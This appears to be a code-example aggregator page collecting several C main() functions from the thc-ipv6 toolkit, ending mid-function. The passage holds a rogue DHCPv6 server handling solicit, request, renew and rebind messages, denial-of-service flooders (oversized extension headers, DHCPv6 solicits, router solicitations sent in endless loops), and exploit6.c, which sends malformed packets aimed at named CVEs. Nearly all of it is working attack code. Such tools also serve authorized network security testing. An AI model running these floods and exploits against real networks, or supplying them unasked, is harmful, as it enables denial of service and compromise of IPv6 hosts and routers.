      ddst.sin6_addr = ((struct sockaddr_in6 *) mhdr.msg_name)->sin6_addr;
      ptr2 = thc_ipv62notation((char *) &ddst.sin6_addr);
      switch (rdatabuf[0]) {
      case 1:
        ptr1 = "Solicitate";
        break;
      case 2:
        ptr1 = "Advertise (illegal, ignored)";
        break;
      case 3:
        ptr1 = "Request";
        break;
      case 4:
        ptr1 = "Confirm";
        break;
      case 5:
        ptr1 = "Renew";
        break;
      case 6:
        ptr1 = "Rebind";
        break;
      case 7:
        ptr1 = "Reply (illegal, ignored)";
        break;
      case 8:
        ptr1 = "Release (ignored)";
        break;
      case 9:
        ptr1 = "Decline (ignored)";
        break;
      case 10:
        ptr1 = "Reconfigure (illegal, ignored)";
        break;
      case 11:
        ptr1 = "Information Request (ignored)";
        break;
      case 12:
        ptr1 = "Relay Forward (ignored)";
        break;
      case 13:
        ptr1 = "Relay Reply (ignored)";
        break;
      default:
        ptr1 = "Unknown (ignored)";
        break;
      }
      printf("Received DHCP6 %s packet from %s\n", ptr1, ptr2);
      free(ptr2);
      if (rdatabuf[0] >= 1 && rdatabuf[0] < 7 && rdatabuf[0] != 2) {
        memset(wdatabuf, 0, sizeof(wdatabuf));
        memcpy(wdatabuf + 1, rdatabuf + 1, 3);
        i = j = 4;
        k = -1;
        if (rdatabuf[0] == 1) { // initial request
          wdatabuf[0] = 2;
          while ((j + 4) < len) {
            l = rdatabuf[j + 2] * 256 + rdatabuf[j + 3];
            if (l + j + 4 > len) {
              l = 0;
              j = len;
              printf("Info: received evil packet\n");
            } else {
              if (rdatabuf[j + 1] == 1) {
                memcpy(wdatabuf + i, rdatabuf + j, l + 4);
                i += l + 4;
              } else if (rdatabuf[j + 1] == 3) {
                k = j;          // just set a pointer
              }
              j += l + 4;
            }
          }
          // add 02, 23
          j = time(NULL);
          memcpy(mybuf + 8, (char *) &j + _TAKE4, 4);
          memcpy(wdatabuf + i, mybuf, mlen);
          i += mlen;
          // now expand 3
          if (k > -1 && rdatabuf[k + 3] == 12 && rdatabuf[k + 2] == 0) {        // copy structure
            memcpy(wdatabuf + i, rdatabuf + k, 16);
          } else {              // or create new
            wdatabuf[i + 1] = 3;
            memcpy(wdatabuf + i + 4, (char *) &j + _TAKE4, 4);   // copy time as IAID
          }
          wdatabuf[i + 3] = 40;
          memset(wdatabuf + i + 8, 0, 8);
          wdatabuf[i + 10] = 0x7f;
          wdatabuf[i + 14] = 0xfe;
          i += 16;
          wdatabuf[i + 1] = 5;
          wdatabuf[i + 3] = 24;
          memcpy(wdatabuf + i + 4, routerip6, 16);      // address
          count++;
          if (csize > 0)
            memcpy(wdatabuf + i + 4 + 16 - csize, (char *) &count, csize);      // counter
          ptr3 = thc_ipv62notation(wdatabuf + i + 4);
          wdatabuf[i + 21] = 2;
          wdatabuf[i + 25] = 2;
          i += 28;
        } else {
          wdatabuf[0] = 7;
          m = 0;
          while ((j + 4) < len) {
            l = rdatabuf[j + 2] * 256 + rdatabuf[j + 3];
            if (l + j + 4 > len) {
              l = 0;
              j = len;
              printf("Info: received evil packet\n");
            } else {            // just copy types 1-3 and 23
              if ((rdatabuf[j + 1] >= 1 && rdatabuf[j + 1] <= 3) || rdatabuf[j + 1] == 23) {
                memcpy(wdatabuf + i, rdatabuf + j, l + 4);
                i += l + 4;
                if (rdatabuf[j + 1] == 23)
                  k = 1;
                if (rdatabuf[j + 1] == 3)
                  m = 1;
              }
              j += l + 4;
            }
          }
          if (k == -1) {
            memcpy(wdatabuf + i, mybuf + 18, 20);
            i += 20;
          }
        }
        len = i;
        if (debug)
          thc_dump_data(wdatabuf, len, "Reply Packet");
        ddst.sin6_family = AF_INET6;
        ddst.sin6_port = htons(546);
        //ddst.sin6_addr = ((struct sockaddr_in6 *)mhdr.msg_name)->sin6_addr;
        ddst.sin6_scope_id = ((struct sockaddr_in6 *) mhdr.msg_name)->sin6_scope_id;
        if (sendto(t, wdatabuf, len, 0, (struct sockaddr *) &ddst, sizeof(ddst)) < 0)
          perror("Error:");
        else {
          ptr2 = thc_ipv62notation((char *) &ddst.sin6_addr);
          if (wdatabuf[0] == 2) {
            printf("Sent DHCP6 Advertise packet to %s (offer: %s)\n", ptr2, ptr3);
            free(ptr3);
          } else if (m)
            printf("Sent DHCP6 Reply packet to %s (address accepted)\n", ptr2);
          else
            printf("Sent DHCP6 Reply packet to %s (did not set address)\n", ptr2);
          free(ptr2);
        }
      }
    }
  }

/*  packet structure:
      1 byte  = type
      3 bytes = sessionid
      while(packet data) {
        2 bytes = type
        2 bytes = length in bytes of following data
        ... defined fixed length data ...
      }

    server listen on ff02::1:2 udp 547
    client connects from linklocal port 546, ttl 1
        01 = solicit
        3 bytes = sessionid
        6 bytes = blog (elapsed, 8)
        8 bytes = 01 blob (client id + time + mac)
        4 bytes = time
        6 bytes = mac
        16 bytes = 03 blob (want perm address)
        5 + length + hostname = hostname
        18 bytes = blob (vendor class, type 16)
        12 bytes = blob (requested options, type 6)
    server sends to linklocal (respect client port), ttl 1
        02 = advertise
        3 bytes = sessionid (copy)
        18 bytes = 01 blob (client copy of client-id)
        8 bytes = 02 blob (server id + time + mac)
        4 bytes = time
        6 bytes = mac
        0003 = give perm address
        2 bytes = length
        4 bytes = IAID (from client request!)
        4 bytes = validity time 1 (1800)
        4 bytes = validity time 2 (2880)
          0005 = address structure
          2 bytes = length (24 bytes)
          16 bytes = address
          4 bytes = validity time (3600)
          4 byte = validity time (same)
        0023 = dns option
        2 bytes = length (16 bytes)
        16 bytes = dns server address
    client sends to ff02::1:2 !
        03 = request
        3 bytes = sessionid
        6 bytes = blog (elapsed, 8)
        8 bytes = 01 blob (client id + time + mac)
        4 bytes = time
        6 bytes = mac
        18 bytes = client (again)
        18 bytes = server (copy)
        44 bytes = address (copy)
        5 + length + hostname = hostname (again)
        18 bytes = blob again (vendor class, type 16)
        12 bytes = blob again (requested options, type 6)
    server replies
        7 = reply
        copy original advertise packet :-)
  */

  return 0;                     // never reached
}
예제 #24
0
int main(int argc, char *argv[]) {
  int test = 0, count = 1, tmplen;
  unsigned char buf[65536], bla[1500], tests[256];
  unsigned char *dst6, *ldst6 = malloc(16), *src6, *lsrc6, *mcast6, *route6, *mal;
  unsigned char *srcmac = NULL, *dstmac = NULL, *routers[2], null_buffer[6];
  thc_ipv6_hdr *hdr;
  int i, j, k, srcmtu, fragsize;
  unsigned char *pkt = NULL, *pkt2 = NULL, *pkt3 = NULL;
  int pkt_len = 0, pkt_len2 = 0, pkt_len3 = 0, noping = 0, mtu = 1500;
  char *interface;
  thc_ipv6_hdr *ipv6;

  if (argc < 3 || strncmp(argv[1], "-h", 2) == 0)
    help(argv[0]);

  if (strcmp(argv[1], "-r") == 0) {
    thc_ipv6_rawmode(1);
    rawmode = 1;
    argv++;
    argc--;
  }

  interface = argv[1];
  if ((dst6 = thc_resolve6(argv[2])) == NULL) {
    fprintf(stderr, "Error: invalid target: %s\n", argv[2]);
    exit(-1);
  }
  //route6 = thc_resolve6("2a01::");
  memcpy(ldst6, dst6, 16);
  memset(ldst6 + 2, 0, 6);
  ldst6[0] = 0xfe;
  ldst6[1] = 0x80;
  mcast6 = thc_resolve6("ff02::1");
  if (argc >= 4)
    test = atoi(argv[3]);
  memset(null_buffer, 0, sizeof(null_buffer));

  src6 = thc_get_own_ipv6(interface, dst6, PREFER_GLOBAL);
  if ((lsrc6 = thc_get_own_ipv6(interface, ldst6, PREFER_LINK)) == NULL) {
    fprintf(stderr, "Error: invalid interface: %s\n", interface);
    exit(-1);
  }
  srcmac = thc_get_own_mac(interface);
  if (rawmode == 0) {
    if ((dstmac = thc_get_mac(interface, src6, dst6)) == NULL) {
      fprintf(stderr, "ERROR: Can not resolve mac address for %s\n", argv[2]);
      exit(-1);
    }
  } else
    dstmac = null_buffer;
  if ((srcmtu = thc_get_mtu(interface)) <= 0) {
    fprintf(stderr, "ERROR: can not get mtu from interface %s\n", interface);
    exit(-1);
  }
  fragsize = ((srcmtu - 62) / 8) * 8;

  setvbuf(stdout, NULL, _IONBF, 0);
  memset(buf, 0, sizeof(buf));
  memset(tests, 0, sizeof(tests));
  memset(bla, 0, sizeof(bla));

  if (test < 1 || test > MAX_TEST) {
    printf("%s %s (c) 2013 by %s %s\n\n", argv[0], VERSION, AUTHOR, RESOURCE);
    printf("Syntax: %s interface destination test-case-number\n\n", argv[0]);
    printf("The following test cases are currently implemented:\n");
    printf("  1 : large hop-by-hop header with router-alert and filled with unknown options\n");
    printf("  2 : large destination header filled with unknown options\n");
    exit(0);
  }

  printf("Performing denial of service test case no. %d attack on %s via %s:\n", test, argv[2], argv[1]);
  printf("A \".\" is shown for every 1000 packets sent, press Control-C to end...\n");

  /********************** TEST CASES ************************/

  if (test == count) {          // 1432
    printf("Test %d: large hop-by-hop header with router-alert and filled with unknown options.\n", count);
    printf("WARNING: this attack affects all routers on the network path to the target!!\n");
    sleep(3);
    if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
      return -1;
    buf[0] = 5;
    buf[1] = 2;
    j = 4;
    i = 2;
    while (j <= 1408) {
      k = (i % 63) + 1;
      buf[j] = k;
      switch (k) {
      case 38:                 // quickstart
        buf[j + 1] = 6;         // length
        buf[j + 2] = 1;         // request type + rate
        buf[j + 3] = 60;        //qs-ttl
        buf[j + 4] = 8;         // nonce
        j += 8;
        break;
      case 5:                  // prevent router alert option twice
        buf[j] = 1;
        // fall through
      default:
        buf[j + 1] = 2;
        j += 4;
      }
      j += buf[j + 1] + 2;
      i++;
    }
    for (i = 1; i < 236; i++) {
      buf[i * 6 - 2] = (i % 63) + 1;
      buf[i * 6 - 1] = 4;
    }
    if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf, 1416) < 0)
      return -1;
    thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, bla, 8, 0);
    if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
      return -1;
  }
  count++;

  if (test == count) {          // 1432
    printf("Test %d: large destination header filled with unknown options.\n", count);
    if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
      return -1;
    for (i = 1; i < 237; i++) {
      buf[6 + i * 6] = (i % 63) + 1;
      buf[5 + i * 6] = 4;
    }
    if (thc_add_hdr_dst(pkt, &pkt_len, buf, 1416) < 0)
      return -1;
    thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, bla, 8, 0);
    if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
      return -1;
  }
  count++;

  if (test == count) {          // 1432
    // code
  }
  count++;


  /******************* END OF TESTCASES ***************************/

  count = 0;
  while (1) {
    thc_send_pkt(interface, pkt, &pkt_len);
    usleep(1);
    count++;
    if (count % 1000 == 0)
      printf(".");
  }

  return 0;
}
예제 #25
0
int main(int argc, char *argv[]) {
  char mac[6] = { 0, 0x0c, 0, 0, 0, 0 }, *pkt = NULL;
  char wdatabuf[1024];
  unsigned char *mac6 = mac, *src, *dst;
  int i, s, len, pkt_len = 0, dlen = 0;
  unsigned long long int count = 0;
  pcap_t *p = NULL;
  int do_all = 1, use_real_mac = 0, use_real_link = 0;

  if (argc < 2 || strncmp(argv[1], "-h", 2) == 0)
    help(argv[0]);

  if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL) printf("WARNING: %s is not working with injection!\n", argv[0]);

  while ((i = getopt(argc, argv, "d:nNr1")) >= 0) {
    switch (i) {
    case 'N':
      use_real_link = 1;        // no break
    case 'n':
      use_real_mac = 1;
      break;
    case '1':
      do_all = 0;
      break;
    case 'd':
      do_dns = 1;
      dns_name = optarg;
      break;
    case 'r':
      i = 0;
      break;                    // just to ignore -r
    default:
      fprintf(stderr, "Error: unknown option -%c\n", i);
      exit(-1);
    }
  }

  memset(mac, 0, sizeof(mac));
  interface = argv[optind];
  if (use_real_link)
    src = thc_get_own_ipv6(interface, NULL, PREFER_LINK);
  else
    src = thc_resolve6("fe80::");
  if (use_real_mac)
    mac6 = thc_get_own_mac(interface);
  if (argc - optind <= 1)
    dst = thc_resolve6("ff02::1:2");
  else
    dst = thc_resolve6(argv[optind + 1]);
  setvbuf(stdout, NULL, _IONBF, 0);
  setvbuf(stderr, NULL, _IONBF, 0);

  if (src == NULL || mac6 == NULL) {
    fprintf(stderr, "Error: invalid interface %s or bad mac/IP defined\n", interface);
    exit(-1);
  }

  // only to prevent our system to send icmp port unreachable messages
  if ((s = thc_bind_udp_port(546)) < 0)
    fprintf(stderr, "Warning: could not bind to 546/udp\n");
  if ((p = thc_pcap_init_promisc(interface, "ip6 and udp and dst port 546")) == NULL) {
    fprintf(stderr, "Error: can not open interface %s in promisc mode\n", interface);
    exit(-1);
  }
  len = sizeof(solicit);
  memcpy(wdatabuf, solicit, len);
  if (do_dns) {
    memcpy(wdatabuf + len, dnsupdate1, sizeof(dnsupdate1));
    dlen = len + 8;
    len += sizeof(dnsupdate1);
    if (dns_name != NULL && strlen(dns_name) < 240) {
      if (dns_name[0] != '.') {
        wdatabuf[len] = '.';
        wdatabuf[dlen - 5]++;
        wdatabuf[dlen - 3]++;
        len++;
      }
      memcpy(wdatabuf + len, dns_name, strlen(dns_name) + 1);
      wdatabuf[dlen - 5] += strlen(dns_name) + 1;
      wdatabuf[dlen - 3] += strlen(dns_name) + 1;
      len += strlen(dns_name) + 1;
    }
    memcpy(wdatabuf + len, dnsupdate2, sizeof(dnsupdate2));
    len += sizeof(dnsupdate2);
  }

  printf("Starting to flood dhcp6 servers locally on %s (Press Control-C to end) ...\n\n", interface);
  while (1) {
    count++;
    if (!use_real_link)
      memcpy(src + 8, (char *) &count, 8);
    // start0: 1-3 rand, 18-21 rand, 22-27 mac, 32-35 rand
    for (i = 0; i < 3; i++) {
      wdatabuf[i + 32] = rand() % 256;
      wdatabuf[i + 18] = rand() % 256;
      mac[i + 2] = rand() % 256;
      if (do_dns)
        wdatabuf[i + dlen] = 'a' + rand() % 26;
    }
    if (!use_real_mac)
      memcpy(wdatabuf + 22, mac, 6);
    memcpy(wdatabuf + 1, (char *) &count + _TAKE3, 3);

    if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src, dst, 1, 0, 0, 0, 0)) == NULL)
      return -1;
    if (thc_add_udp(pkt, &pkt_len, 546, 547, 0, wdatabuf, len) < 0)
      return -1;
    // we have to tone it down, otherwise we will not get advertisements
    if (thc_generate_and_send_pkt(interface, mac6, NULL, pkt, &pkt_len) < 0)
      printf("!");
    pkt = thc_destroy_packet(pkt);
    if (do_all) {
      usleep(75);
      while (thc_pcap_check(p, (char *) check_packets, NULL) > 0);
    }
    if (count % 1000 == 0)
      printf(".");
  }

  return 0;                     // never reached
}
예제 #26
0
파일: flood_rs6.c 프로젝트: BwRy/thc-ipv6
int main(int argc, char *argv[]) {
  char *interface;
  unsigned char mac[6] = "", *mac6 = mac;
  unsigned char buf[1460];
  unsigned char *dst = thc_resolve6("ff02::1"), *src = NULL, *dstmac = NULL;
  int i, k, type = NXT_ICMP6, offset = 14, mychecksum, prefer = PREFER_LINK;
  unsigned char *pkt2 = NULL;
  int pkt_len2 = 0, rawmode = 0, count = 0, do_hop = 0, do_frag = 0, do_dst = 0;
  int until = 0, rand_src = 0, rand_mac = 0;
  thc_ipv6_hdr *hdr = NULL;

  if (argc < 2 || strncmp(argv[1], "-h", 2) == 0)
    help(argv[0]);

  while ((i = getopt(argc, argv, "sSDFH")) >= 0) {
    switch (i) {
    case 'F':
      do_frag++;
      break;
    case 'H':
      do_hop = 1;
      break;
    case 'D':
      do_dst = 1;
      break;
    case 's':
      rand_src = 1;
      break;
    case 'S':
      rand_mac = 1;
      break;
    default:
      fprintf(stderr, "Error: invalid option %c\n", i);
      exit(-1);
    }
  }

  if (argc - optind < 1)
    help(argv[0]);

  srand(time(NULL) + getpid());
  setvbuf(stdout, NULL, _IONBF, 0);

  interface = argv[optind];
  if (argc - optind > 1) {
    if ((dst = thc_resolve6(argv[optind + 1])) == NULL) {
      fprintf(stderr, "Error: could not resolve %s\n", argv[optind + 1]);
      exit(-1);
    }
    if (dst[0] >= 0x20 && dst[0] <= 0xfd)
      prefer = PREFER_GLOBAL;
  }
  dstmac = thc_get_mac(interface, src, dst);  
  src = thc_get_own_ipv6(interface, dst, prefer);
  mac6 = thc_get_own_mac(interface);

  if (mac6 == NULL) {
    fprintf(stderr, "Error: invalid interface %s\n", interface);
    exit(-1);
  }
  
  memset(buf, 0, sizeof(buf));
  buf[0] = 1;
  buf[1] = 1;
  memcpy(buf + 2, mac6, 6);
  i = 8;
  
  if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len2, src, dst, 0, 0, 0, 0, 0)) == NULL)
    return -1;
  if (thc_add_icmp6(pkt2, &pkt_len2, ICMP6_ROUTERSOL, 0, 0, buf, i, 0) < 0)
    return -1;
  thc_generate_pkt(interface, mac6, dstmac, pkt2, &pkt_len2);
  hdr = (thc_ipv6_hdr *) pkt2;

  k = rand();

  if (do_hdr_size)
    offset = do_hdr_size;

  printf("Starting to flood with ICMPv6 router solicitation on %s (Press Control-C to end, a dot is printed for every 1000 packets):\n", interface);
  while (until != 1) {
    if (rand_mac) {
      memcpy(hdr->pkt + 8, (char*) &k + _TAKE4, 4);
      memcpy(hdr->pkt + 14 + 40 + 8 + 2 + 2, (char*) &k + _TAKE4, 4);
    }
    if (rand_src) {
      memcpy(hdr->pkt + 14 + 8 + 8 + 5, (char*) &k + _TAKE3, 3);
    }
    if (rand_mac || rand_src) {
      hdr->pkt[offset + 42] = 0;
      hdr->pkt[offset + 43] = 0;
      mychecksum = checksum_pseudo_header(hdr->pkt + offset + 8, hdr->pkt + offset + 24, NXT_ICMP6, hdr->pkt + offset + 40, pkt_len2 - offset - 40);
      hdr->pkt[offset + 42] = mychecksum / 256;
      hdr->pkt[offset + 43] = mychecksum % 256;
      k++;
    }
    count++;
    if (thc_send_pkt(interface, pkt2, &pkt_len2) < 0) {
      printf("!");
    }

//    usleep(1);
    if (count % 1000 == 0)
      printf(".");
    if (until > 1)
      until--;
  }

  return 0;
}
예제 #27
0
파일: exploit6.c 프로젝트: 0x0mar/thc-ipv6
int main(int argc, char *argv[]) {
  int test = 0, count = 1, tmplen;
  unsigned char buf[1500], bla[1500], tests[256], string[64] = "ip6 and dst ", string2[64] = "ip6 and src ";
  unsigned char *dst6, *ldst6 = malloc(16), *src6, *lsrc6, *mcast6, *route6, *mal;
  unsigned char *srcmac = NULL, *dstmac = NULL, *routers[2], null_buffer[6];
  thc_ipv6_hdr *hdr;
  int i = 0, j, srcmtu, fragsize, offset = 14;
  pcap_t *p;
  unsigned char *pkt = NULL, *pkt2 = NULL, *pkt3 = NULL;
  int pkt_len = 0, pkt_len2 = 0, pkt_len3 = 0, noping = 0, mtu = 1500;
  char *interface;
  thc_ipv6_hdr *ipv6;

  if (argc < 3 || strncmp(argv[1], "-h", 2) == 0)
    help(argv[0]);

  if (strcmp(argv[1], "-r") == 0) {
    thc_ipv6_rawmode(1);
    rawmode = 1;
    argv++;
    argc--;
  }
  if (strcmp(argv[1], "-p") == 0) {
    noping = 1;
    argv++;
    argc--;
  }
  
  if (do_hdr_size)
    offset = do_hdr_size;

  interface = argv[1];
  dst6 = thc_resolve6(argv[2]);
  route6 = thc_resolve6("2a01::");
  memcpy(ldst6, dst6, 16);
  memset(ldst6 + 2, 0, 6);
  ldst6[0] = 0xfe;
  ldst6[1] = 0x80;
  mcast6 = thc_resolve6("ff02::1");
  if (argc >= 4)
    test = atoi(argv[3]);
  memset(buf, 0, sizeof(buf));
  memset(null_buffer, 0, sizeof(null_buffer));

  src6 = thc_get_own_ipv6(interface, dst6, PREFER_GLOBAL);
  if ((lsrc6 = thc_get_own_ipv6(interface, ldst6, PREFER_LINK)) == NULL) {
    fprintf(stderr, "Error: invalid interface %s\n", interface);
    exit(-1);
  }
  strcat(string, thc_ipv62notation(src6));
  strcat(string2, thc_ipv62notation(dst6));
  srcmac = thc_get_own_mac(interface);
  if (rawmode == 0) {
    if ((dstmac = thc_get_mac(interface, src6, dst6)) == NULL) {
      fprintf(stderr, "ERROR: Can not resolve mac address for %s\n", argv[2]);
      exit(-1);
    }
  } else
    dstmac = null_buffer;
  if ((srcmtu = thc_get_mtu(interface)) <= 0) {
    fprintf(stderr, "ERROR: can not get mtu from interface %s\n", interface);
    exit(-1);
  }
  if (do_hdr_size)
    srcmtu -= (do_hdr_size - 14);
  fragsize = ((srcmtu - 62) / 8) * 8;

  if ((p = thc_pcap_init(interface, string)) == NULL) {
    fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string);
    exit(-1);
  }

  setvbuf(stdout, NULL, _IONBF, 0);
  memset(tests, 0, sizeof(tests));

  printf("Performing vulnerability checks on %s via %s:\n", argv[2], argv[1]);
  if (noping == 0 && check_alive(p, interface, src6, dst6) == 0) {
    fprintf(stderr, "Error: target %s is not alive via direct ping6!\n", argv[2]);
    exit(-1);
  } else
    printf("Test  0: normal ping6\t\t\t\tPASSED - we got a reply\n");

  /********************** TEST CASES ************************/

  if (test == 0 || test == count) {     // 1432
    printf("Test %2d: CVE-NONE overlarge ping, 6 checksum combinations\n", count);
    tmplen = 65864;
    if ((mal = malloc(tmplen)) == NULL)
      return -1;
    memset(mal, count % 256, tmplen);
    if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
      return -1;
    thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, mal, tmplen, 0);
    if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
      return -1;
    hdr = (thc_ipv6_hdr *) pkt;
    if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize) < 0)
      return -1;
    // because of the different possible checksum calculations we have to do them all
    hdr->pkt[offset + 40 + 3] = 0xe5;
    if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize) < 0)
      return -1;
    hdr->pkt[offset + 40 + 2] = 0x98;
    hdr->pkt[offset + 40 + 3] = 0xa4;
    if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize) < 0)
      return -1;
    hdr->pkt[offset + 40 + 3] = 0xa3;
    if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize) < 0)
      return -1;
    hdr->pkt[offset + 40 + 2] = 0x84;
    hdr->pkt[offset + 40 + 3] = 0x90;
    if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize) < 0)
      return -1;
    hdr->pkt[offset + 40 + 3] = 0x8f;
    if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize) < 0)
      return -1;
    free(mal);
    pkt = thc_destroy_packet(pkt);
  }
  count++;

  if (test == 0 || test == count) {     // 1432
    printf("Test %2d: CVE-NONE large ping, 3 checksum combinations\n", count);
    tmplen = 65527;
    if ((mal = malloc(tmplen)) == NULL)
      return -1;
    memset(mal, count % 256, tmplen);
    if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
      return -1;
    thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, mal, tmplen, 0);
    if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
      return -1;
    hdr = (thc_ipv6_hdr *) pkt;
    if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize) < 0)
      return -1;
    // because of the different possible checksum calculations we have to do them all
    hdr->pkt[offset + 40 + 2] = 0x31;
    hdr->pkt[offset + 40 + 3] = 0x8c;
    thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize);
    hdr->pkt[offset + 40 + 3] = 0x8a;
    thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize);
    free(mal);
    pkt = thc_destroy_packet(pkt);
  }
  count++;

  if (test == 0 || test == count) {
    printf("Test %2d: CVE-2003-0429 bad prefix length (little information, implementation unsure\n", count);
    memset(bla, count % 256, sizeof(bla));
    if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
      return -1;
    memset(buf, 0, sizeof(buf));
    buf[6] = 4;                 // 4-7: retrans timer
    // option mtu
    buf[8] = 5;
    buf[9] = 1;
    buf[12] = mtu / 16777216;
    buf[13] = (mtu % 16777216) / 65536;
    buf[14] = (mtu % 65536) / 256;
    buf[15] = mtu % 256;
    // option prefix
    buf[16] = 3;
    buf[17] = 4;
    buf[18] = 128;              // prefix length // BUG IS HERE
    buf[19] = 128 + 64;
    memset(&buf[20], 17, 4);
    memset(&buf[24], 4, 4);
    memcpy(&buf[32], route6, 16);
    i += 28;
    // mac address option
    buf[i++] = 1;
    buf[i++] = 1;
    memcpy(buf + i, srcmac, 6);
    i += 6;
    // default route routing option
    buf[i++] = 0x18;            // routing entry option type
    buf[i++] = 0x03;            // length 3 == 24 bytes
    buf[i++] = 0x00;            // prefix length
    buf[i++] = 0x08;            // priority, highest of course
    i += 2;                     // 52-53 unknown
    buf[i++] = 0x11;            // lifetime, word
    buf[i++] = 0x11;            // lifetime, word
    i += 16;                    // 56-71 address, all zeros for default
    thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, count, (unsigned char *) &buf, i, 0);
    if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
      return -1;
    pkt = thc_destroy_packet(pkt);
  }
  count++;

  if (test == 0 || test == count) {
    printf("Test %2d: CVE-2004-0257 ping, send toobig on reply, then SYN pkt\n", count);
    memset(bla, count % 256, sizeof(bla));
    memset(buf, 0, sizeof(buf));
    if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 64, 0, 0, 0, 0)) == NULL)
      return -1;
    if (thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, (unsigned char *) &bla, 68, 0) < 0)
      return -1;
    if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
      return -1;
    ipv6 = (thc_ipv6_hdr *) pkt;
    thc_inverse_packet(ipv6->pkt + offset, ipv6->pkt_len - offset);
    sleep(1);
    thc_toobig6(interface, src6, srcmac, dstmac, 68, ipv6->pkt + offset, ipv6->pkt_len - offset);
    i = 0;
    while (ports[i] != 0) {
      if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 0, 0, 0, 0, 0)) == NULL)
        return -1;
      if (thc_add_tcp(pkt, &pkt_len, 1100 + i * 100, ports[i], i * 1000, 0, TCP_SYN, 5760, 0, NULL, 0, NULL, 0) < 0)
        return -1;
      if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
        return -1;
      pkt = thc_destroy_packet(pkt);
      pkt_len = 0;
      i++;
    }
  }
  count++;

/*
  if (test == 0 || test == count) {
    printf("Test %2d: CVE-20\n", count);
    memset(bla, count % 256, sizeof(bla));
    memset(buf, 0, sizeof(buf));
    if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
      return -1;
    buf[0] = 0;
    thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, count, (unsigned char *) &buf, i, 0);
    if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
      return -1;
    pkt = thc_destroy_packet(pkt);
  }
  count++;

  if (test == 0 || test == count) {
    printf("Test %2d: CVE-20\n", count);
    memset(bla, count % 256, sizeof(bla));
    memset(buf, 0, sizeof(buf));
    if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
      return -1;
    buf[0] = 0;
    thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, count, (unsigned char *) &buf, i, 0);
    if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
      return -1;
    pkt = thc_destroy_packet(pkt);
  }
  count++;
*/
/*
  if (test == 0 || test == count) {
    printf("Test %2d: CVE-20\n", count);
    memset(bla, count%256, sizeof(bla));
    memset(buf, 0, sizeof(buf));
    if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
      return -1;
    buf[0] = 0;
    thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, count, (unsigned char *) &buf, i, 0);
    if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
      return -1;
    pkt = thc_destroy_packet(pkt);
  }
  count++;
*/

  // more?

  /******************* END OF TESTCASES ***************************/

  if (noping == 1 || check_alive(p, interface, src6, dst6))
    printf("Test %2d: normal ping6 (still alive?)\t\tPASSED - we got a reply\n", count);
